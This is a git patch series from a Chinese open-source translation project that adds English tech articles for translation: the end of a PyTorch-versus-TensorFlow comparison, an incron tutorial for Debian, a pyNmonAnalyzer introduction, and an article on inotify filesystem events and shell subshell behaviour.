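+    print(sess.run(y, feed_dict={x: [[1.0, 2.0, 3.0]]}))
+```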
+
+PyTorch is well suited to training RNNs (recurrent neural networks), as they run faster in [PyTorch][6] than in TensorFlow. PyTorch works with a dynamic computational graph (DCG), so you can define and change the model on the go. In a DCG, each block can be debugged separately, which makes training neural networks easier.
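+
+By contrast, here is a small PyTorch sketch of the define-by-run style (the toy computation and loop are illustrative only): the graph is built as the Python code executes, so ordinary control flow can change the computation from one input to the next, and autograd still traces it.
+
+```
+import torch
+
+w = torch.randn(3, requires_grad=True)
+
+def score(x):
+    h = x * w                                  # each op extends the graph on the fly
+    for _ in range(int(x.sum().item()) % 3):   # data-dependent control flow
+        h = torch.tanh(h)
+    return h.sum()
+
+out = score(torch.tensor([1.0, 2.0, 3.0]))
+out.backward()                                 # autograd walks the graph just built
+print(w.grad)
+```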
+
+TensorFlow has recently introduced TensorFlow Fold, a library designed to create TensorFlow models that work on structured data. Like PyTorch, it implements dynamic computational graphs and claims large speedups of up to 10x on CPU and more than 100x on GPU. With the help of [Dynamic Batching][7], you can now implement deep learning models that vary in size as well as structure.
+
+### Comparing GPU and CPU optimizations
+
+TensorFlow has faster compile times than PyTorch and provides flexibility for building real-world applications. It can run on just about any kind of hardware, from CPUs, GPUs, and TPUs to mobile devices and the Raspberry Pi (IoT devices).
+
+PyTorch, on the other hand, includes tensor computations that can speed up deep neural network models by [50x or more][8] using GPUs. These tensors can live on the CPU or the GPU, and both back ends are written as independent libraries, making PyTorch efficient to use regardless of the size of the neural network.
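+
+A tiny sketch of that CPU/GPU flexibility (matrix sizes are arbitrary; it falls back to the CPU when no CUDA device is present):
+
+```
+import torch
+
+device = "cuda" if torch.cuda.is_available() else "cpu"
+
+a = torch.rand(2048, 2048, device=device)
+b = torch.rand(2048, 2048, device=device)
+c = a @ b                 # runs on whichever device the tensors live on
+print(c.device, c.shape)
+```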
+
+### Community Support
+
+TensorFlow is one of the most popular deep learning frameworks today, and with that popularity comes huge community support. It has great documentation and an extensive set of online tutorials. TensorFlow also includes numerous pre-trained models hosted on [GitHub][9], which give developers and researchers who are keen to work with TensorFlow some ready-made material to save time and effort.
+
+PyTorch, on the other hand, has a relatively small community, since it was developed fairly recently. Compared to TensorFlow, the documentation isn't as strong, and ready-made code is harder to find. However, PyTorch does allow individuals to share their pre-trained models with others.
+
+### PyTorch and TensorFlow - A David & Goliath story
+
+As it stands, TensorFlow is clearly favoured and used more than PyTorch, for a variety of reasons.
+
+TensorFlow is vast, mature, and well suited to practical use. It is the obvious choice for most machine learning and deep learning experts because of the vast array of features it offers and, most importantly, its maturity in the market. It has better community support, multiple language APIs, good documentation, and plenty of ready-to-use code, which makes it production-ready. Hence, it is better suited for someone who wants to get started with deep learning, or for organizations wanting to productize their deep learning models.
+
+Although PyTorch is relatively new and has a smaller community, it is fast and efficient. In short, it gives you all the power of Torch wrapped in the usefulness and ease of Python. Because of its efficiency and speed, it is a good option for small, research-based projects. As mentioned earlier, companies such as Facebook, Twitter, and many others are using PyTorch to train deep learning models. However, its adoption has yet to go mainstream. The potential is evident, but PyTorch is not yet ready to challenge the beast that is TensorFlow. Considering its growth, though, the day may not be far off when PyTorch is further optimized and offers more functionality--to the point that it becomes the David to TensorFlow's Goliath.
+
+### Savia Lobo
+A Data science fanatic. Loves to be updated with the tech happenings around the globe. Loves singing and composing songs. Believes in putting the art in smart.
+
+
+--------------------------------------------------------------------------------
+
+via: https://datahub.packtpub.com/deep-learning/dl-wars-pytorch-vs-tensorflow/
+
+作者:[Savia Lobo][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://datahub.packtpub.com/author/savial/
+[1]:https://www.packtpub.com/web-development/deep-learning-theano
+[2]:https://www.packtpub.com/big-data-and-business-intelligence/deep-learning-keras
+[3]:https://www.packtpub.com/big-data-and-business-intelligence/deep-learning-tensorflow
+[4]:https://www.tensorflow.org/deploy/distributed
+[5]:https://www.tensorflow.org/versions/r0.12/get_started/basic_usage
+[6]:https://www.reddit.com/r/MachineLearning/comments/66rriz/d_rnns_are_much_faster_in_pytorch_than_tensorflow/
+[7]:https://arxiv.org/abs/1702.02181
+[8]:https://github.com/jcjohnson/pytorch-examples#pytorch-tensors
+[9]:https://github.com/tensorflow/models
From 957d6126a7b704b774398c52d414c21d3b8e7bb4 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:58:02 +0800
Subject: [PATCH 274/371] add done: 20170915 Deep learning wars-
Facebook-backed PyTorch vs Google-s TensorFlow.md
---
...arning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md (100%)
diff --git a/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md b/sources/talk/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
similarity index 100%
rename from sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
rename to sources/talk/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
From 34ca8f6c88e1d49d038cc27b760426f4a114f481 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 22:06:36 +0800
Subject: [PATCH 275/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20trigge?=
=?UTF-8?q?r=20commands=20on=20File/Directory=20changes=20with=20Incron=20?=
=?UTF-8?q?on=20Debian?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Directory changes with Incron on Debian.md | 224 ++++++++++++++++++
1 file changed, 224 insertions(+)
create mode 100644 sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md
diff --git a/sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md b/sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md
new file mode 100644
index 0000000000..2c66a40d1e
--- /dev/null
+++ b/sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md
@@ -0,0 +1,224 @@
+How to trigger commands on File/Directory changes with Incron on Debian
+======
+
+This guide shows how you can install and use **incron** on a Debian 9 (Stretch) system. Incron is similar to cron, but instead of running commands based on time, it can trigger commands when file or directory events occur (e.g. a file modification, changes of permissions, etc.).
+
+### 1 Prerequisites
+
+ * System administrator permissions (root login). All commands in this tutorial should be run as the root user in the shell.
+ * I will use the editor "nano" to edit files. You may replace nano with an editor of your choice or install nano with "apt-get install nano" if it is not installed on your server.
+
+
+
+### 2 Installing Incron
+
+Incron is available in the Debian repository, so we install incron with the following apt command:
+
+```
+apt-get install incron
+```
+
+The installation process should be similar to the one in this screenshot.
+
+[![Installing Incron on Debian 9][1]][2]
+
+### 3 Using Incron
+
+Incron usage is very much like cron usage. You have the incrontab command that lets you list (-l), edit (-e), and remove (-r) incrontab entries.
+
+To learn more about it, see:
+
+```
+man incrontab
+```
+
+There you also find the following section:
+
+```
+If /etc/incron.allow exists only users listed here may use incron. Otherwise if /etc/incron.deny exists only users NOT listed here may use incron. If none of these files exists everyone is allowed to use incron. (Important note: This behavior is insecure and will be probably changed to be compatible with the style used by ISC Cron.) Location of these files can be changed in the configuration.
+```
+
+This means if we want to use incrontab as root, we must either delete /etc/incron.allow (which is unsafe because then every system user can use incrontab)...
+
+```
+rm -f /etc/incron.allow
+```
+
+... or add root to that file (recommended). Open the /etc/incron.allow file with nano:
+
+```
+nano /etc/incron.allow
+```
+
+And add the following line. Then save the file.
+```
+root
+```
+
+Before you do this, you will get error messages like this one when trying to use incrontab:
+
+```
+server1:~# incrontab -l
+user 'root' is not allowed to use incron
+```
+
+
+
+Afterwards it works:
+
+```
+server1:~# incrontab -l
+no table for root
+```
+
+
+
+We can use the command:
+
+```
+incrontab -e
+```
+
+to create incron jobs. Before we do this, let's take a look at the incrontab man page:
+
+```
+man 5 incrontab
+```
+
+The man page explains the format of the incrontab entries. Basically, the format is as follows...
+
+```
+<path> <mask> <command>
+```
+
+...where `<path>` can be a directory (meaning the directory and/or the files directly in that directory (not files in subdirectories of that directory!) are watched) or a file.
+
+`<mask>` can be one of the following:
+
+IN_ACCESS File was accessed (read) (*)
+IN_ATTRIB Metadata changed (permissions, timestamps, extended attributes, etc.) (*)
+IN_CLOSE_WRITE File opened for writing was closed (*)
+IN_CLOSE_NOWRITE File not opened for writing was closed (*)
+IN_CREATE File/directory created in watched directory (*)
+IN_DELETE File/directory deleted from watched directory (*)
+IN_DELETE_SELF Watched file/directory was itself deleted
+IN_MODIFY File was modified (*)
+IN_MOVE_SELF Watched file/directory was itself moved
+IN_MOVED_FROM File moved out of watched directory (*)
+IN_MOVED_TO File moved into watched directory (*)
+IN_OPEN File was opened (*)
+
+When monitoring a directory, the events marked with an asterisk (*) above can occur for files in the directory, in which case the name field in the
+returned event data identifies the name of the file within the directory.
+
+The IN_ALL_EVENTS symbol is defined as a bit mask of all of the above events. Two additional convenience symbols are IN_MOVE, which is a combination of IN_MOVED_FROM and IN_MOVED_TO, and IN_CLOSE which combines IN_CLOSE_WRITE and IN_CLOSE_NOWRITE.
+
+The following further symbols can be specified in the mask:
+
+IN_DONT_FOLLOW Don't dereference pathname if it is a symbolic link
+IN_ONESHOT Monitor pathname for only one event
+IN_ONLYDIR Only watch pathname if it is a directory
+
+Additionally, there is a symbol which doesn't appear in the inotify symbol set. It is IN_NO_LOOP. This symbol disables monitoring events until the current one is completely handled (until its child process exits).
+
+`<command>` is the command that should be run when the event occurs. The following wildcards may be used inside the command specification:
+
+```
+$$ dollar sign
+$@ watched filesystem path (see above)
+$# event-related file name
+$% event flags (textually)
+$& event flags (numerically)
+```
+
+If you watch a directory, then $@ holds the directory path and $# the file that triggered the event. If you watch a file, then $@ holds the complete path to the file and $# is empty.
+
+If you need the wildcards but are not sure what they translate to, you can create an incron job like this. Open the incron incrontab:
+
+```
+incrontab -e
+```
+
+and add the following line:
+
+```
+/tmp/ IN_MODIFY echo "$$ $@ $# $% $&"
+```
+
+Then you create or modify a file in the /tmp directory and take a look at /var/log/syslog - this log shows when an incron job was triggered, if it succeeded or if there were errors, and what the actual command was that it executed (i.e., the wildcards are replaced with their real values).
+
+```
+tail /var/log/syslog
+```
+
+```
+...
+Jan 10 13:52:35 server1 incrond[1012]: (root) CMD (echo "$ /tmp .hello.txt.swp IN_MODIFY 2")
+Jan 10 13:52:36 server1 incrond[1012]: (root) CMD (echo "$ /tmp .hello.txt.swp IN_MODIFY 2")
+Jan 10 13:52:39 server1 incrond[1012]: (root) CMD (echo "$ /tmp hello.txt IN_MODIFY 2")
+Jan 10 13:52:39 server1 incrond[1012]: (root) CMD (echo "$ /tmp .hello.txt.swp IN_MODIFY 2")
+```
+
+In this example, I've edited the file /tmp/hello.txt; as you can see, $@ translates to /tmp, $# to _hello.txt_, $% to IN_MODIFY, and $& to 2. I used an editor that creates a temporary .swp file, which results in the additional lines in syslog.
+
+Now enough theory. Let's create our first incron jobs. I'd like to monitor the file /etc/apache2/apache2.conf and the directory /etc/apache2/sites-available/, and whenever there are changes, I want incron to restart Apache. This is how we do it:
+
+```
+incrontab -e
+```
+```
+/etc/apache2/apache2.conf IN_MODIFY /usr/sbin/service apache2 restart
+/etc/apache2/sites-available/ IN_MODIFY /usr/sbin/service apache2 restart
+```
+
+That's it. For test purposes, you can modify your Apache configuration and take a look at /var/log/syslog, and you should see that incron restarts Apache.
+
+**NOTE**: To avoid loops, do not perform any action from within an incron job in a directory that you monitor. **Example:** If you monitor the /tmp directory for changes and each change triggers a script that writes a log file to /tmp, this will cause a loop and might bring your system to high load or even crash it.
+
+To list all defined incron jobs, you can run:
+
+```
+incrontab -l
+```
+
+```
+server1:~# incrontab -l
+/etc/apache2/apache2.conf IN_MODIFY /usr/sbin/service apache2 restart
+/etc/apache2/sites-available/ IN_MODIFY /usr/sbin/service apache2 restart
+```
+
+
+
+To delete all incron jobs of the current user, run:
+
+```
+incrontab -r
+```
+
+```
+server1:~# incrontab -r
+removing table for user 'root'
+table for user 'root' successfully removed
+```
+
+### 4 Links
+
+Debian http://www.debian.org
+Incron Software: http://inotify.aiken.cz/?section=incron&page=about&lang=en
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/trigger-commands-on-file-or-directory-changes-with-incron-on-debian-9/
+
+作者:[Till Brehm][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/trigger-commands-on-file-or-directory-changes-with-incron-on-debian-8/incron-debian-9.png
+[2]:https://www.howtoforge.com/images/trigger-commands-on-file-or-directory-changes-with-incron-on-debian-8/big/incron-debian-9.png
From a641eb42d0e7244cb4449d3813838f0e0be3a172 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 22:23:06 +0800
Subject: [PATCH 276/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Python=20Nmon=20A?=
=?UTF-8?q?nalyzer:=20moving=20away=20from=20excel=20macros?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Analyzer- moving away from excel macros.md | 101 ++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
diff --git a/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md b/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
new file mode 100644
index 0000000000..3591e379d5
--- /dev/null
+++ b/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
@@ -0,0 +1,101 @@
+translating by lujun9972
+Python Nmon Analyzer: moving away from excel macros
+======
+[Nigel's monitor][1], dubbed "Nmon", is a fantastic tool for monitoring, recording, and analyzing a Linux/*nix system's performance over time. Nmon was originally developed by IBM and open sourced in the summer of 2009. By now, Nmon is available on just about every Linux platform and architecture. It provides a great real-time command-line visualization of current system statistics, such as CPU, RAM, network, and disk I/O. However, Nmon's greatest feature is the capability to record system performance snapshots over time.
+For example: `nmon -f -s 1`.
+![nmon CPU and Disk utilization][2]
+This will create a log file starting off with some system metadata (sections AAA - BBBV), followed by timed snapshots of all monitored system attributes, such as CPU and memory usage. This produces a file that is hard to interpret directly in a spreadsheet application, hence the birth of the [Nmon_Analyzer][3] Excel macro. This tool is great if you have access to a Windows/Mac machine with Microsoft Office installed. If not, there is also the Nmon2rrd tool, which generates RRD input files from which you can build your graphs. This is a rather rigid approach and slightly painful. To provide a more flexible tool, I am introducing pyNmonAnalyzer, which aims to offer a customizable solution for generating organized CSV files and simple HTML reports with [matplotlib][4]-based graphs.
+
+### Getting Started:
+
+System requirements:
+As the name indicates, you will need Python. Additionally, pyNmonAnalyzer depends on matplotlib and numpy. If you are on a Debian-derivative system, these are the packages you'll need to install:
+```
+$> sudo apt-get install python-numpy python-matplotlib
+
+```
+
+##### Getting pyNmonAnalyzer:
+
+Either clone the git repository:
+```
+$> git clone git@github.com:madmaze/pyNmonAnalyzer.git
+
+```
+
+or
+
+Download the current release here: [pyNmonAnalyzer-0.1.zip][5]
+
+Next, we need an Nmon file. If you do not already have one, either use the example provided in the release or record a sample: `nmon -F test.nmon -s 1 -c 120`. This will record 120 snapshots at 1-second intervals to test.nmon.
+
+Let's have a look at the basic help output:
+```
+$> ./pyNmonAnalyzer.py -h
+usage: pyNmonAnalyzer.py [-h] [-x] [-d] [-o OUTDIR] [-c] [-b] [-r CONFFNAME]
+ input_file
+
+nmonParser converts Nmon monitor files into time-sorted
+CSV/Spreadsheets for easier analysis, without the use of the
+MS Excel Macro. Also included is an option to build an HTML
+report with graphs, which is configured through report.config.
+
+positional arguments:
+ input_file Input NMON file
+
+optional arguments:
+ -h, --help show this help message and exit
+ -x, --overwrite overwrite existing results (Default: False)
+ -d, --debug debug? (Default: False)
+ -o OUTDIR, --output OUTDIR
+ Output dir for CSV (Default: ./data/)
+ -c, --csv CSV output? (Default: False)
+ -b, --buildReport report output? (Default: False)
+ -r CONFFNAME, --reportConfig CONFFNAME
+ Report config file, if none exists: we will write the
+ default config file out (Default: ./report.config)
+
+```
+
+There are two main ways to use this tool:
+
+ 1. Turn the Nmon file into a set of separate CSV files
+ 2. Generate an HTML report with matplotlib graphs
+
+
+
+The following command does both:
+```
+$> ./pyNmonAnalyzer.py -c -b test.nmon
+
+```
+
+This will create a directory called ./data in which you will find a folder of CSV files ("./data/csv/"), a folder of PNG graphs ("./data/img/") and an HTML report ("./data/report.html").
+
+By default, the HTML report will include graphs for CPU, disk busy, memory utilization, and network transfers. This is all defined in a self-explanatory configuration file, "report.config". At the moment this is not yet very flexible, as CPU and MEM can only be toggled on or off, but one of the next steps will be to refine the plotting approach and expose more control over which graphs plot which data points.
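+
+If you want graphs the report does not offer yet, nothing stops you from plotting the generated CSVs yourself with matplotlib. The short Python sketch below does exactly that; the file name ("cpu_all.csv") and its column headers are assumptions for the example, so check the actual headers of the files in ./data/csv/ on your system.
+
+```
+import csv
+import matplotlib.pyplot as plt
+
+user, sys_ = [], []
+with open("data/csv/cpu_all.csv") as f:          # assumed file name
+    for row in csv.DictReader(f):
+        user.append(float(row["User%"]))         # assumed column names
+        sys_.append(float(row["Sys%"]))
+
+plt.plot(range(len(user)), user, label="User%")
+plt.plot(range(len(sys_)), sys_, label="Sys%")
+plt.xlabel("snapshot")
+plt.ylabel("CPU utilization (%)")
+plt.legend()
+plt.savefig("cpu_custom.png")
+```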
+
+### Report Example:
+
+[![pyNmonAnalyzer Graph output][6]
+**Click to see the full Report**][7]
+
+Currently these reports are very bare-bones and only print out basic labeled graphs, but development is ongoing. A wizard that will make adjusting the configuration easier is currently in development. Please do let me know if you have any suggestions, find any bugs, or have feature requests.
+
+--------------------------------------------------------------------------------
+
+via: https://matthiaslee.com/python-nmon-analyzer-moving-away-from-excel-macros/
+
+作者:[Matthias Lee][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://matthiaslee.com/
+[1]:http://nmon.sourceforge.net/
+[2]:https://matthiaslee.com//content/images/2015/06/nmon_cpudisk.png
+[3]:http://www.ibm.com/developerworks/wikis/display/WikiPtype/nmonanalyser
+[4]:http://matplotlib.org/
+[5]:https://github.com/madmaze/pyNmonAnalyzer/blob/master/release/pyNmonAnalyzer-0.1.zip?raw=true
+[6]:https://matthiaslee.com//content/images/2017/04/teaser-short_0.png (pyNmonAnalyzer Graph output)
+[7]:http://matthiaslee.com/pub/pyNmonAnalyzer/data/report.html
From 21c32814a3e45a41fe179179946885608981e7b7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 22:38:51 +0800
Subject: [PATCH 277/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Filesyste?=
=?UTF-8?q?m=20Events=20with=20inotify?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...08 Linux Filesystem Events with inotify.md | 789 ++++++++++++++++++
1 file changed, 789 insertions(+)
create mode 100644 sources/tech/20180108 Linux Filesystem Events with inotify.md
diff --git a/sources/tech/20180108 Linux Filesystem Events with inotify.md b/sources/tech/20180108 Linux Filesystem Events with inotify.md
new file mode 100644
index 0000000000..5e35f06ea8
--- /dev/null
+++ b/sources/tech/20180108 Linux Filesystem Events with inotify.md
@@ -0,0 +1,789 @@
+translating by lujun9972
+Linux Filesystem Events with inotify
+======
+
+Triggering scripts with incron and systemd.
+
+It is, at times, important to know when things change in the Linux OS. The uses to which systems are placed often include high-priority data that must be processed as soon as it is seen. The conventional method of finding and processing new file data is to poll for it, usually with cron. This is inefficient, and it can tax performance unreasonably if too many polling events are forked too often.
+
+Linux has an efficient method for alerting user-space processes to changes impacting files of interest. The inotify Linux system calls were first discussed here in Linux Journal in a [2005 article by Robert Love][6], who primarily addressed the behavior of the new features from the perspective of C.
+
+However, there also are stable shell-level utilities and new classes of monitoring dæmons for registering filesystem watches and reporting events. Linux installations using systemd also can access basic inotify functionality with path units. The inotify interface does have limitations—it can't monitor remote, network-mounted filesystems (that is, NFS); it does not report the userid involved in the event; it does not work with /proc or other pseudo-filesystems; and mmap() operations do not trigger it, among other concerns. Even with these limitations, it is a tremendously useful feature.
+
+This article completes the work begun by Love and gives everyone who can write a Bourne shell script or set a crontab the ability to react to filesystem changes.
+
+### The inotifywait Utility
+
+Working under Oracle Linux 7 (or similar versions of Red Hat/CentOS/Scientific Linux), the inotify shell tools are not installed by default, but you can load them with yum:
+
+```
+
+ # yum install inotify-tools
+Loaded plugins: langpacks, ulninfo
+ol7_UEKR4 | 1.2 kB 00:00
+ol7_latest | 1.4 kB 00:00
+Resolving Dependencies
+--> Running transaction check
+---> Package inotify-tools.x86_64 0:3.14-8.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+==============================================================
+Package Arch Version Repository Size
+==============================================================
+Installing:
+inotify-tools x86_64 3.14-8.el7 ol7_latest 50 k
+
+Transaction Summary
+==============================================================
+Install 1 Package
+
+Total download size: 50 k
+Installed size: 111 k
+Is this ok [y/d/N]: y
+Downloading packages:
+inotify-tools-3.14-8.el7.x86_64.rpm | 50 kB 00:00
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+Warning: RPMDB altered outside of yum.
+ Installing : inotify-tools-3.14-8.el7.x86_64 1/1
+ Verifying : inotify-tools-3.14-8.el7.x86_64 1/1
+
+Installed:
+ inotify-tools.x86_64 0:3.14-8.el7
+
+Complete!
+
+```
+
+The package will include two utilities (inotifywait and inotifywatch), documentation and a number of libraries. The inotifywait program is of primary interest.
+
+Some derivatives of Red Hat 7 may not include inotify in their base repositories. If you find it missing, you can obtain it from [Fedora's EPEL repository][7], either by downloading the inotify RPM for manual installation or adding the EPEL repository to yum.
+
+Any user on the system who can launch a shell may register watches—no special privileges are required to use the interface. This example watches the /tmp directory:
+
+```
+
+$ inotifywait -m /tmp
+Setting up watches.
+Watches established.
+
+```
+
+If another session on the system performs a few operations on the files in /tmp:
+
+```
+
+$ touch /tmp/hello
+$ cp /etc/passwd /tmp
+$ rm /tmp/passwd
+$ touch /tmp/goodbye
+$ rm /tmp/hello /tmp/goodbye
+
+```
+
+those changes are immediately visible to the user running inotifywait:
+
+```
+
+/tmp/ CREATE hello
+/tmp/ OPEN hello
+/tmp/ ATTRIB hello
+/tmp/ CLOSE_WRITE,CLOSE hello
+/tmp/ CREATE passwd
+/tmp/ OPEN passwd
+/tmp/ MODIFY passwd
+/tmp/ CLOSE_WRITE,CLOSE passwd
+/tmp/ DELETE passwd
+/tmp/ CREATE goodbye
+/tmp/ OPEN goodbye
+/tmp/ ATTRIB goodbye
+/tmp/ CLOSE_WRITE,CLOSE goodbye
+/tmp/ DELETE hello
+/tmp/ DELETE goodbye
+
+```
+
+A few relevant sections of the manual page explain what is happening:
+
+```
+
+$ man inotifywait | col -b | sed -n '/diagnostic/,/helpful/p'
+ inotifywait will output diagnostic information on standard error and
+ event information on standard output. The event output can be config-
+ ured, but by default it consists of lines of the following form:
+
+ watched_filename EVENT_NAMES event_filename
+
+ watched_filename
+ is the name of the file on which the event occurred. If the
+ file is a directory, a trailing slash is output.
+
+ EVENT_NAMES
+ are the names of the inotify events which occurred, separated by
+ commas.
+
+ event_filename
+ is output only when the event occurred on a directory, and in
+ this case the name of the file within the directory which caused
+ this event is output.
+
+ By default, any special characters in filenames are not escaped
+ in any way. This can make the output of inotifywait difficult
+ to parse in awk scripts or similar. The --csv and --format
+ options will be helpful in this case.
+
+```
+
+It also is possible to filter the output by registering particular events of interest with the -e option, the list of which is shown here:
+
+| access | create | move_self |
+| ------------- | ----------- | ---------- |
+| attrib | delete | moved_to |
+| close_write | delete_self | moved_from |
+| close_nowrite | modify | open |
+| close | move | unmount |
+
+A common application is testing for the arrival of new files. Since inotify must be given the name of an existing filesystem object to watch, the directory containing the new files is provided. A trigger of interest is also easy to provide—new files should be complete and ready for processing when the close_write trigger fires. Below is an example script to watch for these events:
+
+```
+
+#!/bin/sh
+unset IFS # default of space, tab and nl
+ # Wait for filesystem events
+inotifywait -m -e close_write \
+ /tmp /var/tmp /home/oracle/arch-orcl/ |
+while read dir op file
+do [[ "${dir}" == '/tmp/' && "${file}" == *.txt ]] &&
+ echo "Import job should start on $file ($dir $op)."
+
+ [[ "${dir}" == '/var/tmp/' && "${file}" == CLOSE_WEEK*.txt ]] &&
+ echo Weekly backup is ready.
+
+ [[ "${dir}" == '/home/oracle/arch-orcl/' && "${file}" == *.ARC ]] &&
+ su - oracle -c 'ORACLE_SID=orcl ~oracle/bin/log_shipper' &
+
+ [[ "${dir}" == '/tmp/' && "${file}" == SHUT ]] && break
+
+ ((step+=1))
+done
+
+echo We processed $step events.
+
+```
+
+There are a few problems with the script as presented—of all the available shells on Linux, only ksh93 (that is, the AT&T Korn shell) will report the "step" variable correctly at the end of the script. All the other shells will report this variable as null.
+
+The reason for this behavior can be found in a brief explanation on the manual page for Bash: "Each command in a pipeline is executed as a separate process (i.e., in a subshell)." The MirBSD clone of the Korn shell has a slightly longer explanation:
+
+```
+
+# man mksh | col -b | sed -n '/The parts/,/do so/p'
+ The parts of a pipeline, like below, are executed in subshells. Thus,
+ variable assignments inside them fail. Use co-processes instead.
+
+ foo | bar | read baz # will not change $baz
+ foo | bar |& read -p baz # will, however, do so
+
+```
+
+And, the pdksh documentation in Oracle Linux 5 (from which MirBSD mksh emerged) has several more mentions of the subject:
+
+```
+
+General features of at&t ksh88 that are not (yet) in pdksh:
+ - the last command of a pipeline is not run in the parent shell
+ - `echo foo | read bar; echo $bar' prints foo in at&t ksh, nothing
+ in pdksh (ie, the read is done in a separate process in pdksh).
+ - in pdksh, if the last command of a pipeline is a shell builtin, it
+ is not executed in the parent shell, so "echo a b | read foo bar"
+ does not set foo and bar in the parent shell (at&t ksh will).
+ This may get fixed in the future, but it may take a while.
+
+$ man pdksh | col -b | sed -n '/BTW, the/,/aware/p'
+ BTW, the most frequently reported bug is
+ echo hi | read a; echo $a # Does not print hi
+ I'm aware of this and there is no need to report it.
+
+```
+
+This behavior is easy enough to demonstrate—running the script above with the default bash shell and providing a sequence of example events:
+
+```
+
+$ cp /etc/passwd /tmp/newdata.txt
+$ cp /etc/group /var/tmp/CLOSE_WEEK20170407.txt
+$ cp /etc/passwd /tmp/SHUT
+
+```
+
+gives the following script output:
+
+```
+
+# ./inotify.sh
+Setting up watches.
+Watches established.
+Import job should start on newdata.txt (/tmp/ CLOSE_WRITE,CLOSE).
+Weekly backup is ready.
+We processed events.
+
+```
+
+Examining the process list while the script is running, you'll also see two shells, one forked for the control structure:
+
+```
+
+$ function pps { typeset a IFS=\| ; ps ax | while read a
+do case $a in *$1*|+([!0-9])) echo $a;; esac; done }
+
+$ pps inot
+ PID TTY STAT TIME COMMAND
+ 3394 pts/1 S+ 0:00 /bin/sh ./inotify.sh
+ 3395 pts/1 S+ 0:00 inotifywait -m -e close_write /tmp /var/tmp
+ 3396 pts/1 S+ 0:00 /bin/sh ./inotify.sh
+
+```
+
+As it was manipulated in a subshell, the "step" variable above was null when control flow reached the echo. Switching this from #!/bin/sh to #!/bin/ksh93 will correct the problem, and only one shell process will be seen:
+
+```
+
+# ./inotify.ksh93
+Setting up watches.
+Watches established.
+Import job should start on newdata.txt (/tmp/ CLOSE_WRITE,CLOSE).
+Weekly backup is ready.
+We processed 2 events.
+
+$ pps inot
+ PID TTY STAT TIME COMMAND
+ 3583 pts/1 S+ 0:00 /bin/ksh93 ./inotify.sh
+ 3584 pts/1 S+ 0:00 inotifywait -m -e close_write /tmp /var/tmp
+
+```
+
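+If switching shells is not an option, recent versions of bash offer workarounds of their own. Below is a minimal sketch; it assumes bash 4.2 or later for the lastpipe option, while the process-substitution variant shown in the comments works on older releases as well:
+
+```
+
+#!/bin/bash
+# Sketch: keep "step" in the parent shell under bash.
+# lastpipe runs the last stage of a pipeline in the current shell;
+# it takes effect only when job control is off (i.e., in a script).
+shopt -s lastpipe
+
+step=0
+inotifywait -m -e close_write /tmp /var/tmp |
+while read dir op file
+do ((step+=1))
+   [[ "${dir}" == '/tmp/' && "${file}" == SHUT ]] && break
+done
+
+echo "We processed $step events."
+
+# An alternative is process substitution, which avoids the pipeline:
+#   while read dir op file; do ...; done \
+#     < <(inotifywait -m -e close_write /tmp /var/tmp)
+
+```
+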
+Although ksh93 behaves properly and in general handles scripts far more gracefully than all of the other Linux shells, it is rather large:
+
+```
+
+$ ll /bin/[bkm]+([aksh93]) /etc/alternatives/ksh
+-rwxr-xr-x. 1 root root 960456 Dec 6 11:11 /bin/bash
+lrwxrwxrwx. 1 root root 21 Apr 3 21:01 /bin/ksh ->
+ /etc/alternatives/ksh
+-rwxr-xr-x. 1 root root 1518944 Aug 31 2016 /bin/ksh93
+-rwxr-xr-x. 1 root root 296208 May 3 2014 /bin/mksh
+lrwxrwxrwx. 1 root root 10 Apr 3 21:01 /etc/alternatives/ksh ->
+ /bin/ksh93
+
+```
+
